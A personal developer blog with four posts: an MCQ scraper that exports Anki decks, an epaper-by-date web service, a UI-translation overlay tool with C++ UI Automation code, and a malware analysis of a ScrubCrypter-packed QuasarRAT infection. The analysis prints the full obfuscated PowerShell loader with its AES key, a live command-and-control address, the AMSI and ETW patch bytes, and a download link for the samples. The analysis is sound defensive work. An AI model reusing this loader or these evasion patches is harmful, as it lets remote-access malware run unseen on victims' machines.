CodeWorth

Wednesday, May 29, 2024

MCQ Scraper

This is a simple .NET 8 console application that scrapes MCQs from different online sources and consolidates them into a single SQLite DB. Check the schema of the table in the attached picture below.

Currently, it only collects Civil Engineering-related questions from IndiaBix for a select few categories, but this can be extended to other sources as well.

The program itself is pretty brittle in its current state - no allowance has been made for exceptions that I didn't encounter during development. Logging is a pretty basic custom implementation as well, and it was an after-thought (log file is constantly opened and written to every time a new line is to be logged, so be sure to disable it if you feel it hitting performance too much). Still, in the current form, the operation was completed in a matter of a couple minutes.

Regarding dependencies, it uses simple Regex matching when possible and also HtmlAgilityPack for parsing the scraped HTML pages into manageable DOMs for easier filtering.

The resulting output DB file is available here.

Console output from the program in action

Top few entries from the output DB

UPDATE (31 May, 2024):

I've worked in a few improvements to the program and pushed the code changes to the repository. Now, it can also create Anki-flashcards so that the scraped content is actually useful. Also equally importantly, the program also has a bugfix/QoL enhancement so that the <img> tags are also checked for in the question texts/prompts as well - a possibility that I had ignored before - and the referenced images are downloaded, base64-encoded and replaced in place, ready for use in HTML as-is.

For the past day or two, I was wondering if I should create a separate app (I was thinking maybe a Vue-powered SPA) to actually make use of the DB; but a couple of hours' worth of internet research led me to believe that it would be a lot more efficient if this DB could be made available to Anki instead of reinventing the wheel all over again. Oh, and this apparently really popular app was first brought to my attention by ChatGPT-4o when I asked it "what is the best strategy to memorize around 4500 mcqs for a competitive exam?" Anki was literally the first option in the list it returned where it suggested to use it as a Spaced Repetition System (SRS) for "active learning". I had to download and play around with it for a bit before I could actually understand its workings. I also searched for any and all add-ons the Anki community had for Multiple Choice Questions and a tried one or two of them. But I didn't really like them too much - and I didn't know how I could export the questions from the DB to a form that these add-ons would understand either. So, taking the advice of a wise Reddit user somewhere, I just ditched the idea of using any sort of add-on altogether for MCQs and began exploring the import and export format used by Anki. It turned out that the program can import/export in a few different formats but I chose the simple plaintext format for obvious reasons and studied its structure. I created a new default deck - a term I have gathered means a collection of cards sharing some similarity; so in this case, a deck can represent a category - such as building-materials, or surveying, etc. Then I created two cards manually from inside Anki, each one following the pattern of the question prompt and the multiple options on the front side and the answer on the back side of the card. This is also where I learned that Anki has first-class support for HTML content in its flash-card contents, which was perfect for me since I didn't have to worry about all the tags in my scraped questions and options, not to mention the <img> tags. Anyway, then I exported the cards from Anki's File menu (still not sure if it exports just a single deck or all of them to the same file) to a plaintext file and studied the structure of the exported file. It was really intuitive, and I figured it would be easy enough to automate this process to convert the questions from my scraped DB to this format that Anki understood (I had also successfully tried externally modifying the export file and importing it back to Anki again, without any hiccup). So, that's what I did. I simply added a class library project to the Visual Studio solution and added in the functionality to get read-to-import Anki plaintext files from the SQLite DB produced by MCQer. And voila:

The *.txt files are the import-ready Anki plaintext files produced by our program

Confirming an import in Anki

Browsing the imported deck of cards (notice the images)

Another file, another deck of cards imported

A flashcard, when in action

Sunday, February 4, 2024

Gorkhapatra By Date

I used to visit the official Gorkhapatra epaper site and download the latest epaper to see if there were any PSC vacancies, up until a few months ago. I eventually stopped doing that, but until then, for about two years, everyday, I downloaded the daily epaper and uploaded it to DriveHQ. I had managed to exhaust two entire accounts' worth of storage with just Gorkhapatra pdf's. One thing I felt was lacking in the site was that the ability to download epapers older than 1 week, and the system was generally clunky and unreliable. So, this is why Gorkhapatra By Date was conceived.

Initially I had thought that I had to save the actual pdf's, because I wasn't sure the links would be valid past the 1-week-old mark but as I've learned in the past two weeks of developing this service, they are. So, I decided to just save the available links and do away with downloading the actual files.

Architecture-wise, the service is really simple. It's made up of two parts, one of which is just a CodeIgniter-based API server that retrieves the link to the epaper for the requested date, if present of course, from a table in the database. It also has another endpoint that simply lists the available dates. The links themselves are scraped from the original epaper site using a simple PHP script running as a cron job every 6 hours and the table is updated with any new link available. The script could technically be run just once a day typically a few tens of minutes past 12 AM (I've observed over the years that that's around the most likely time of upload of the day's paper to the site, though not always) but I've learned not to rely on this pattern.

The cron script doesn't just scrape the links and blindly insert them to the DB's table either. The original links present on the site are not direct links to the pdf's, however, the direct links are readily available with some simple URL string manipulation, so it does that as well.

Also, since we need to be sure which date the pdf belongs to, we cannot just rely on the file name of the pdf (which is supposed to be a combination of the English and the Nepali dates of the day, but is very often wrong). As a solution, we actually download the contents of the pdf's and parse them (using smalot's pdf parser library for PHP) and obtain their metadata. Even after going through all this, the date specified in the metadata isn't always reliable. So, we perform a regex pattern matching on the first page of the pdf's after they've been parsed by the library. Only then do we have a reliable date for each file (unless the pattern of date printed in the pdf changes as well, in which case, we'll need to update our regex).

The parsing itself turns out to be really CPU-intensive (the script finished parsing 8 pdf's comfortably within a minute on my local machine while it easily took 25-30 on my shared hosting server) but memory is where I hit a wall. Turns out, one of the pdf's was 22 pages and a simple memory_get_usage() function call logged into the script after the call to the parser revealed that the script was eating up ~170MB of memory for the file. My shared hosting config was set to 128MB for a script, so, as was expected, the script crashed upon reaching this particular pdf among the scraped list of 8: "Fatal Error: Allowed Memory Size of 134217728 Bytes Exhausted ...". Turns out, in a shared hosting environment, modifying the php.ini file isn't possible. Thankfully, the cPanel did have a page where I could change a bunch of different parameters for PHP, including memory_limit, which was initially set to 128MB that I promptly set to 512MB (the same as my development environment in XAMPP). Side note: I learnt after much back and forth with the hosting support that the change from cPanel modifies, to my utter befuddlement initially, not the php.ini file (which as they pointed out is global across the server, and is set to 128MB) but the httpd.conf file (which is separate for each user account on the server), which has precedence over the php.ini file. I learned that the memory limit set inside scripts have the highest precedence, then the httpd.conf file, only then followed by php.ini. I also learned about the php --ini and php --info commands and the phpinfo() function. The first one gives you info regarding where the php.ini file that the currently installed PHP binary is configured to use is located. The second one gives you info about the actual PHP configurations including memory_limit, and the third one is just the PHP function to do the same. Neat stuff.

Okay, once we have the date and the link for all available epapers we scraped (usually 8), we just insert them to the table and let MySQL handle the duplicates.

The front end is hosted on the main domain (ajashra.com) while the API server resides in a subdomain (api.ajashra.com), so the API server needs to allow CORS with the Access-Control-Allow-Origin header set to "https://ajashra.com". This was new for me and it took about half a day to fully iron out using the "before" filter feature in CodeIgniter4. Some cool stuff I learned there. The Same Origin Policy that necessitated this is only enforced by web browsers, so, while calling the API from front-end code from an origin other than the main domain will fail, the API still works for any non-web-browser consumer.

The JS library - "Vanilla Calendar" was used for the front-end to present an intuitive calendar interface where a user can see which dates are available for download. Clicking on any available date on the calendar directly leads to the corresponding epaper being downloaded.

Here's the URL for the service.

Wednesday, September 6, 2023

ScreenTranslator

At work, I have to work with QQ, an Instant Messaging program and it's got an International version and a Chinese version. For the Chinese version of the app, I mostly have to rely on Google Lens to translate the UI to English.

So, about 3-4 days ago, I thought why not make a desktop program to do the translation instead of having to open Google Lens on my phone every time I want to make sense of a weird menu item in QQ's UI. So, this is my attempt at that. All it does is it iterates through the automation/accessibility elements in the app, gets English translations for each of the elements' texts and creates an overlay window with the translated text right over them. I first wanted to use Google's Translate API but that seems to require a credit card even for the free tier, so I settled for a free API that uses LibreTranslate. The translations are not as good as Google Translate but one can make out the meaning with some deliberation.

UI of the program

UI of the program during the translation process

QQ's menu before translation

QQ's menu after translation

The operation of the program is simple, middle click on any window to translate the texts in it. Move your cursor to the top left corner of your screen to remove all translation overlays.

The program doesn't work for entire webpages because webpages tend to have a lot of elements (in my case with multiple tabs open with one being a Chinese site, I counted over 10k elements) to process. The C# library I've used here for automation elements extraction simply doesn't care for a large number of elements and simply returns empty. It should work in scenarios dealing with a limited number of elements such as software programs with their UI in a foreign language.

Here's the GitHub repo and here's the release

Here's the MDD:

Musings During Development of ScreenTranslator:
------------------------------------------------

Don't ever create Forms on multiple threads. Use the main UI thread for all your window needs. You'll save a lot of headaches this way. I'd tried creating the translation overlays in separate threads for each new overlay but faced problems such as residual windows when the thread they were created in were aborted (meaning I would have to interact with the overlays to get rid of them), design problem regarding how to best close the overlay windows (abort the threads they were created in or make the overlay forms themselves listen to a flag?; do I create a new window using .Show() followed by Application.Run() or .ShowDialog()? and why? - at any rate, when the thread was aborted externally, the ThreadAbortedException would only be triggered inside each thread when the cursor was placed over them, not immediately), problem regarding some translations being randomly missed for whatever reason and so on.
Just do whatever processing actually made you take the multi-threading route in different thread(s) and spare the UI/form creation logic to the main UI thread. this.Invoke() and this.BeginInvoke() are your friends. All of the problems that I described above went POOF when I did that. Countless StackOverflow posts don't recommend doing exactly this for no reason. If you're creating forms in separate threads, re-think your design. You will probably make it far simpler and solve most of your problems by leaving UI operations (that includes new form creation) to the main UI thread.

.NET's form's TopMost property is crap, like a lot of other things (Automation API comes to mind cuz it's also sth I've used in this project - or I should say, I've avoided in favor of the native automation API wrapper - CUIAutomation). Just use the native Win32 API: SetWindowPos() with the right params for it.

September 4, 2023 | 08:24 PM
-----------------------------
During automation tree iteration, you won't see what's not visible. I was trying to get all descendants of a web browser (firefox) to see if my tool worked to translate entire webpages but it didn't work. In the investigation, I found out that the CUIAutomation library was flat returning null for the FindAll() method when given the IUIAutomationElement returned from a call to ElementFromHwnd() (with the Hwnd obtained by the WindowFromPoint() API applied to the value returned by GetCursorPos()). To investigate what was happening, I opened Spy++ to see if I was getting the right hwnd and I found that the hwnd I had obtained from WindowFromPoint() was a child of a parent hwnd for firefox. I then got the parent hwnd for it and tried FindAll() with descendants as the treescope but I was still getting empty or null results. Then I thought to myself that the CUIAutomation library must be at fault here, after all, FindAll() with descendants is a very taxing operation, as suggested by MSDN. So, I made a fully functional program for the same in C++:
`
#include <iostream>
#include <Windows.h>
#include <UIAutomationClient.h>
#include <vector>

IUIAutomation* g_pAutomation;

void doItFaster();
std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element);
std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement);

int main()
{
std::cout << "Hello World!\n";
doItFaster();
}

void doItFaster() {
HRESULT _ = CoInitialize(NULL);
if (_ == S_OK || _ == S_FALSE) {
HRESULT hr = CoCreateInstance(__uuidof(CUIAutomation), NULL, CLSCTX_INPROC_SERVER, __uuidof(IUIAutomation), (void**)&g_pAutomation);

HWND hWndFirefox = (HWND)0x0006009E;
IUIAutomationElement* pBrowserElement;
if (g_pAutomation->ElementFromHandle((UIA_HWND)hWndFirefox, &pBrowserElement) == S_OK) {
IUIAutomationCondition* iUIAutomationCondition;
if (g_pAutomation->CreateTrueCondition(&iUIAutomationCondition) == S_OK) {

IUIAutomationTreeWalker* pAutomationTreeWalker;
if (g_pAutomation->get_ContentViewWalker(&pAutomationTreeWalker) == S_OK) {

auto leafElements = GetDescendants(pBrowserElement); // watch this

std::vector<std::wstring> leafElementNames;
for (auto leafElement : leafElements) {
BSTR name;
if (leafElement->get_CurrentName(&name) == S_OK && name != NULL) {
leafElementNames.push_back(std::wstring(name, SysStringLen(name))); // and this
}
}

int x = 0; // bp here

}

}

}

}
}

std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element)
{
std::vector<IUIAutomationElement*> leafElements;

auto children = GetChildren(element);

if (children.size() == 0) { // this is a leaf element
leafElements.push_back(element);
}
else {
for (auto child : children)
{
auto descendants = GetDescendants(child);
leafElements.insert(leafElements.begin(), descendants.begin(), descendants.end());
}
}

return leafElements;

}

std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement) {
std::vector<IUIAutomationElement*> retval;

IUIAutomationCondition* trueCondition;
g_pAutomation->CreateTrueCondition(&trueCondition);
IUIAutomationElementArray* children;
if (parentElement->FindAll(TreeScope_Children, trueCondition, &children) == S_OK) {
int numberOfChildren;
if (children->get_Length(&numberOfChildren) == S_OK) {
for (int i = 0; i < numberOfChildren; i++) {
IUIAutomationElement* child;
if (children->GetElement(i, &child) == S_OK) {
retval.push_back(child);
}
}
}
}

return retval;
}

`
It took me doing this that brought me to the realization that what was actually happening was that the web browser needed to be almost completely visible i.e. not blocked by any other window for the element extraction to work. My Visual Studio 2019 IDE was most definitely blocking the browser window when it was running.
ref: https://stackoverflow.com/questions/69122441/uiautomation-missing-to-catch-some-elements
There's no need to write my own custom FindAll descendants method like I did with recursion in the C++ version above. The built-in FindAll() with descendants treescope will work just fine. I only did what I did because I thought the stack was overflowing or something.
Also, the hwnd to be used for the parent element to do FindAll() is not what's available by WindowFromPoint(). You need to get the absolute parent window of the output of that API call to be sure. It might work for apps such as QQ (in my case, it worked perfectly fine with QQ but it clearly didn't, when I tried translating a Chinese website, which is what led to all of this) but doesn't work for all windows, especially web browsers.

September 5, 2023 | 03:39 PM
----------------------------
Turns out, FindAll() method provided by the IUIAutomation C# NuGet Package doesn't give results (i.e gives 0 length IUIAutomationElementArray) if there's a large number of elements. I tried parsing a firefox webpage browsing to csdn.com - a Chinese language site and the C++ code above (my own version of FindAll() for getting all descendants) took around 30s but returned over 10k elements. Did FindAll() with the treesccope of descendants in C# for the same hwnd/element and it immediately returned with a length of 0 (not null, but an IUIAutomationElementArray with length 0). Maybe porting the C++ version of GetDescendants() to C# by manually recursing through all immediate children would work for C# as well but I'm not going to do it. Just don't use it on websites.
For Brave browser with my outlook open on a tab, both the default FindAll() descendants in C# and the C++ version work just fine and there's around 370 elements.

September 6, 2023 | 11:50 AM
------------------------------
https://stackoverflow.com/questions/13225841/starting-application-on-start-up-using-the-wrong-path-to-load
When running on user logon (via HKCU Run entry), the working directory is not the application exe location. So, file paths that haven't been fully qualified don't work.

Thursday, July 13, 2023

ScrubCrypter malware analysis

I was at my desk in office. Must have been around 12 or 12.30 PM, July 12, 2023. Suddenly, Windows Defender showed a “Threat found” alert. That immediately drew my attention. I checked to see which file it had detected and noticed it was a “udgbQ.vbs” file inside %appdata% that Defender had tagged. Of course, once I got to the folder, I saw Defender immediately remove from there. If I remember correctly, it was just a 1 KB file – I couldn’t get a look into its contents. However, I also saw two more files – “udgbQ.bat.exe” and “udgbQ.bat” :

(Read after finishing the article: Of note here is that at first, the exe file wasn’t visible even when the “Show hidden files” option in Windows Explorer was checked. But Process Hacker was reporting that such a process was already running and when asked to go to the file path of the process, it would take right to %appdata%, with no trace of the exe file – only the bat file could be seen. I then surmised from CurrPorts’ Process Attributes value of “AHS” that it must have set it to be an Archived Hidden System file. So I did an “attrib –s –h –a –r *.*” in the folder and the exe file finally showed. The attrib trick is from the good old days of virus hunting in Windows XP when I was in school – something that my Computer Science teacher had told us.)

I went into panic mode. I opened up the contents of the rather large bat file and it was a load of gibberish. I’ve included in this folder the same file as a .txt file (“udgbQ.bat.txt”) so that it’s not executed accidentally. Anyway, its content looks like the following:

Lines 2 through 7 and the final line 9 are legible. This batch script basically runs a powershell instance hidden and copies the legit powershell binary to its folder with its own name with an “.exe” appended, then it calls the copied powershell binary with a huge commandline argument (the call "%p%" %U:uLqiO=% line’s %U:uLqiO=% variable resolves into the correct argument because of the huge “set” command of line 8).

I tried figuring out what this mangled content would resolve into manually but I had also fired up Process Hacker by then and when I took a look at the commandline for the “udgbQ.bat.exe” process that was now running, it was already in plaintext:

First, I suspended the process after realizing it had already established a connection to the following:

Remote address: 51.77.167.52

Remote host name: ip52.ip-51-77-167.eu

Remote port: 6060

Local port: 63421

Protocol: TCP

(I made this observation using the Nirsoft program “CurrPorts”). I then looked into the commandline passed to this weirdly named powershell binary. The commandline was the following:

$oIou='InnJKbvonJKbknJKbenJKb'.Replace('nJKb', '');$AzqP='EnnJKbtrnJKbyPonJKbinJKbntnJKb'.Replace('nJKb', '');$LWEJ='ChnJKbannJKbgenJKbEnJKbxtenJKbnsnJKbionnJKb'.Replace('nJKb', '');$Jwxg='TranJKbnsnJKbfnJKbormnJKbFinnJKbanJKblBlnJKbocknJKb'.Replace('nJKb', '');$pWwA='LoadnJKb'.Replace('nJKb', '');$eDxq='CreanJKbtnJKbeDnJKbecnJKbrypnJKbtnJKbornJKb'.Replace('nJKb', '');$DtTM='MnJKbainJKbnnJKbMonJKbdnJKbulenJKb'.Replace('nJKb', '');$JZlt='SpnJKblinJKbtnJKb'.Replace('nJKb', '');$xzWC='GnJKbetCnJKburnJKbrnJKbennJKbtPnJKbrocnJKbesnJKbsnJKb'.Replace('nJKb', '');$aZrq='FnJKbronJKbmnJKbBnJKbasenJKb64nJKbStrnJKbingnJKb'.Replace('nJKb', '');$zerm='FirnJKbstnJKb'.Replace('nJKb', '');$euof='ReanJKbdnJKbLinJKbnnJKbesnJKb'.Replace('nJKb', '');function SHmms($fIyrX){$OXHzj=[System.Security.Cryptography.Aes]::Create();$OXHzj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OXHzj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OXHzj.Key=[System.Convert]::$aZrq('Ku4UyUqCrVKpr817sKewP+3V+wWyOhyCkaqfyyShZ9E=');$OXHzj.IV=[System.Convert]::$aZrq('6ttlhKwyOYtu8WT6FBC9HQ==');$RRNwL=$OXHzj.$eDxq();$jXMSp=$RRNwL.$Jwxg($fIyrX,0,$fIyrX.Length);$RRNwL.Dispose();$OXHzj.Dispose();$jXMSp;}function ODGMY($fIyrX){$nYjJX=New-Object System.IO.MemoryStream(,$fIyrX);$fmBrg=New-Object System.IO.MemoryStream;$lLnxw=New-Object System.IO.Compression.GZipStream($nYjJX,[IO.Compression.CompressionMode]::Decompress);$lLnxw.CopyTo($fmBrg);$lLnxw.Dispose();$nYjJX.Dispose();$fmBrg.Dispose();$fmBrg.ToArray();}$KawWa=[System.Linq.Enumerable]::$zerm([System.IO.File]::$euof([System.IO.Path]::$LWEJ([System.Diagnostics.Process]::$xzWC().$DtTM.FileName, $null)));$RIswh=$KawWa.Substring(3).$JZlt(':');$qTCRy=ODGMY (SHmms ([Convert]::$aZrq($RIswh[0])));$DWMcP=ODGMY (SHmms ([Convert]::$aZrq($RIswh[1])));[System.Reflection.Assembly]::$pWwA([byte[]]$DWMcP).$AzqP.$oIou($null,$null);[System.Reflection.Assembly]::$pWwA([byte[]]$qTCRy).$AzqP.$oIou($null,$null);

This was better than what was in the bat file but still not entirely obvious. I tried a bunch of things including manually cleaning up the .Replace() calls and separating out the semicolon-delimeted lines for better readability, tried CyberChef as well but finally settled on just pasting the whole thing into Visual Studio Code, saved it as a .ps1 file (powershell script) (after realizing it’s a powershell script) and formatted the file using VS Code’s PowerShell extension. It got a lot cleaner and looked a lot more like a normal powershell script. I didn’t want to do the .Replace() calls on my own, so I just added a breakpoint after all the .Replace() calls and simply hovered my cursor above the variables to get what they resolved to. Eventually, I manually replaced all the variables with their resolved string values as follows:

(Note that I’ve modified line 42 to use a valid path to the .exe file)

This script file has also been included in the same folder as this document.

I stepped through the code in VS Code, careful not to actually run whatever it is trying to run (I’ve commented out the final two lines of this file that actually Invoke the two payloads) and let VS Code and PowerShell do all the decrypting and what have you. I also added code to dump the payloads as .bin files

So, recapitulating the situation as a whole, the .bat file itself contains the compressed, encrypted and base64’ed version of the contents of the two payloads separated by a colon ‘:’ towards the beginning of the file and also contains the batch script that instructs powershell to get these two payloads and execute them. All of that information in just one file! That’s really cool.

Anyway, I managed to dump the first payload (decompressed ~1.2 MB) and Windows Defender and Avira (at this point, I’d already hurriedly installed the best free AV solution I know - Avira Antivirus) immediately picked it up. I disabled them for a moment and asked what VirusTotal thought of it:

Here’s the scan link.

Running Exe Info PE on the payload revealed that it’s a .NET assembly, and running .NET Reflector on it suggests that it’s a .NET assembly likely crypted with ScrubCrypter :

The actual RAT or stealer or whatever it is, is encrypted and is going to be decrypted and loaded at runtime by this .NET crypter.

It is obvious from Reflector that this assembly is obfuscated. So, I used de4dot to deobfuscate it:

Though it says Unknown obfuscation, it produces a deobfuscated assembly and loading it up with dnSpy reveals that the deobfuscation works:

The class names and the methods and the variables are legible.

Now, I just place a breakpoint at line 31 (guessing the previous line returns the decrypted payload to a byte array) and just right click on the “rawAssembly” local variable and click Save and voila, I have the original payload. It is about 3.2 MB in size and Detect It Easy says the payload is a .NET Framework 4 executable as well:

VirusTotal is fairly certain that it is QuasarRAT:

Now, moving on to the next payload in the bat file (obtained by dumping the byte array inside the function call @ line 45 of the powershell script). This payload appears to be smaller – only about 15 KB. Virustotal says it’s a Trojan named “Barys”:

I load it in dnSpy and see mangled names here as well, similar to the first payload, so I use de4dot on it to deobfuscate/clean it as far as possible(though it says the obfuscator is unknown here as well):

Here’s the payload loaded in dnSpy, both the original version and the cleaned version:

The names are readable at least, though the strings are all gibberish and a lot of Win32 API calls appear to have been made dynamically. Lots of Marshal.GetDelegateForFunctionPointer() calls as well. The names of the API calls aren’t visible either:

Looks like it’s obtaining the address of API function addresses from its process and resolving them to their corresponding function delegates. These delegates and their parameters look familiar – CloseHandle(), VirtualProtect(), CreateFile(), CreateFileMapping(), CopyMemory(), IsWow64Process() etc.

And it’s also got it’s own GetProcAddress() implementation as smethod_4. In this screenshot, it’s running through the 1634 exports of kernel32.dll whose base address it got from this other method smethod_3 which basically functions as its own version of GetModuleHandle():

And it stops once it arrives at the requested API call (in this case, CloseHandle()), it returns the address:

And it’s got smethod_2 that gives it the address of any exported API function from any library using the results of smethod_3 and smethod_4:

The following static members are delegates or ready-to-use functions for these win32 APIs: kernel32.dll!CloseHandle(), kernel32.dll!FreeLibrary(), kernel32.dll!VirtualProtect(), kernel32.dll!CreateFileA(), kernel32.dll!CreateFileMappingA(), kernel32.dll!MapViewOfFile(), msvcrt.dll!memcpy(), psapi.dll!GetModuleInformation() and kernel32.dll!IsWow64Process():

Oh, and smethod_0 is what resolves the garbage strings to their real forms:

Now, let’s see the Main() method of the program:

It calls smethod_1 with “ntdll.dll” as the parameter (the smethod_0 call resolves the Chinese-looking characters into “ntdll.dll”):

I copied the method into Visual Studio Code and added some comments, since the previously prepared delegates for win32 API functions have been used in this method. I’ve included this code in the “SecondPayload” folder:

I also asked Skype’s Bing chat what this code did:

I also searched the internet for why a program might want to manually map ntdll and came up with some informative articles:

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/

Turns out, it’s an AV evasion technique to avoid falling into the trap of hooks set by antivirus software. Most realtime AV software will place hooks into API functions exported by windows dll files that are commonly used by most programs to inspect the data being passed to these functions and check if anything fishy is going on and stuff like that. If a malware calls any API exported by such a dll say, ntdll.dll, its function calls are going to be intercepted by the AV. So, in a bid to circumvent this “function hooking” set up by AVs, malwares use a trick called “manual mapping” of the required dlls, so that the modified/hooked function exports of the loaded dlls are replaced by a fresh copy mapped directly from their corresponding files on disk. After this step, the malware can safely call any export of the dll and be sure that the AV won’t be privy to this operation.

So, all that method_1 is doing is mapping a fresh, unmodified copy of ntdll.dll to its memory. The same thing is being done to kernel32.dll as well, if the OS is Windows 10 or 11 (major version no. > 10) and 64-bit:

Now, line 16 i.e. smethod_0 call looks like following:

The first parameter is “amsi.dll” – a dll file present on Windows OS starting from Windows 10 and it exposes functions for checking if a given buffer contains malicious code. (See AmsiScanBuffer function on MSDN) The second parameter is “AmsiScanBuffer” which is a function exported by amsi.dll. On Windows, when PowerShell is opened, it always loads this dll and calls the aforementioned function to check for malicious payloads when it is executing powershell scripts. The third parameter ‘byte_0’ holds an array of bytes: { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } and the fourth parameter ‘byte_1’ holds { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } which looked like opcodes to me and I asked Skype Bing Chat, to which it replied with astonishing specificity and insight – as if these bytes are always used in association with AmsiScanBuffer patching:

So, it basically looks like it’s trying to patch the contents of the AmsiScanBuffer function with bytes that return AMSI_RESULT_CLEAN (for details, look it up on MSDN) for both x32 and x64 bit version of the process. Apparently, “amsi bypass” has been a thing ever since PowerShell based malware rose to prominence:

https://blog.f-secure.com/hunting-for-amsi-bypasses/

https://threatresearch.ext.hp.com/disabling-anti-malware-scanning-amsi/

https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux

I would guess, if this .NET payload (which is very small btw, 15 KB these days is considered tiny) is loaded by a powershell script (which runs in the process of PowerShell) via Reflection (Assembly.Load() and what not) and invoked (https://stackoverflow.com/questions/23174205/how-can-i-run-an-exe-file-with-assembly-class), the PowerShell process would be defenseless against malicious scripts – even well known and signature payloads would fail to be reported since the AmsiScanBuffer function would always return clean.

In my case, where I’m running the payload separately as a debugee using dnSpy’s debugger, there’s no “amsi.dll” to be found in this process’ modules as is evident from Process Hacker:

So, the program throws an exception and lands on the catch block at line 44:

Now, the smethod_0 call at line 17 looks like the following:

It’s trying to patch another function exported by ntdll – EtwEventWrite()

Turns out, this function is used by processes to expose information about the managed assemblies (.NET binaries) that have been loaded in them. Tools like Process Hacker can see the .NET assemblies loaded in a process because all processes participate in this reporting using EtwEventWrite(). More info can be found all over the internet but I read this article by Adam Chester and found it really enlightening: https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/

From this article, I also learnt that the previous function patch for amsi.dll also works for managed processes using .NET Framework 4.8 and above (they apply checks, when Assembly.Load()’ing a .NET assembly, for malware using amsi.dll’s AmsiScanBuffer()):

More info on this topic is available on the post by Adam Chester I linked above.

Anyway, going back to our EtwEventWrite function patch, the bytes used for patching this time are (third and fourth params of smethod_0) are { 0xC3 } and { 0xC2, 0x14, 0x00 }:

0xC3 is obviously a RET and the 3 bytes in the fourth parameter correspond to RET 0x14 apparently, according to Skype Bing Chat:

Obviously, as before, the fourth parameter is for patching in a x64 bit process.

So, the second call to smethod_0 is intended to hide the loading of .NET assemblies to a process (typically unmanaged, as I gathered from the previous article) so that tools such as Process Hacker and probably AVs don’t see what .NET assemblies have been loaded into a process. And of course, this time, it succeeds because ntdll is loaded in all processes:

That’s all this binary does. So, going back to our original powershell script:

Observing lines 48 and 49, it’s clear that the powershell instance is going to first execute the second payload for the amsi and EtwEventWrite bypass and then the actual, first payload which VirusTotal thought was QuasarRAT. If all had gone well, a PowerShell process would have been running QuasarRAT and Windows Defender wouldn’t have a clue, and neither it nor we would be any wiser to the fact that a RAT had been loaded into it.

Some side notes:

-Avira doesn’t consistently detect the second payload. Sometimes, it says clean and sometimes says it’s a malware and quarantines it.

-I had noticed mouse cursor flickering a week or two prior to this incident and noted down the times:

July 4, 2023

10:45 AM

12:56 PM

1:55 PM

3:15 PM

3:45 PM

4:15 PM

July 6, 2023

2 PM

2:45 PM

July 7, 2023

2:45 PM

5:15 PM

5:32 PM

July 11, 2023

3:45 PM

4:15 PM

4:36 PM

5:15 PM

-I still don’t know what caused the malware to be dropped into %appdata% in the first place.

-I was at first convinced that the file “udgbQ.bat.exe” was the malware but later realized it’s just an x86 PowerShell binary copied from System32.

-The two payloads have been included in “FirstPayload” and “SecondPayload” folders separately. Each folder contains “output.bin.zip” which is the Gzipped version dumped from the powershell script and can be extracted using Winrar/7-zip. Or, just run the powershell script for decompressing the payloads and dump those bytearrays instead for the actual executable payload.

Download the malware here